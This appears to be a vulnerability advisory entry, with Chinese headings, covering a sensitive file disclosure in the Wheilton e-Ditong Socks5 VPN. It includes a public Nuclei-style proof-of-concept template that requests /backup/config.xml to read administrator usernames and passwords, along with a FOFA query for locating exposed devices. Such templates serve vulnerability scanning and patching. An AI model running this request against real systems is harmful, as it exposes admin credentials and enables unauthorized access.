socks5-vpn-config: Socks5 VPN - Sensitive File Disclosure

日期: 2025-08-01 | 影响软件: socks5 vpn | POC: 已公开

漏洞描述

Information Leakage in the Socks5 VPN login system of Wheilton e-Ditong, and the administrator account password can be obtained by visiting a specially crafted URL.

PoC代码[已公开]

id: socks5-vpn-config

info:
  name: Socks5 VPN - Sensitive File Disclosure
  author: DhiyaneshDk
  severity: high
  description: |
    Information Leakage in the Socks5 VPN login system of Wheilton e-Ditong, and the administrator account password can be obtained by visiting a specially crafted URL.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E6%83%A0%E5%B0%94%E9%A1%BF/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="惠尔顿-e地通VPN"
  tags: esocks5,exposure,misconfig,files,disclosure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/backup/config.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<config>"
          - "password="
          - "username="
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bf6867477415225e4aebe963cac70d01a87a7098e4c7ecb7fd7b75261b6e50f302207dd816a71b0b1972529db69bfa731cb1f6bf433096b95580290ddc28259b6f7f:922c64590222798bb761d5b6d8e72950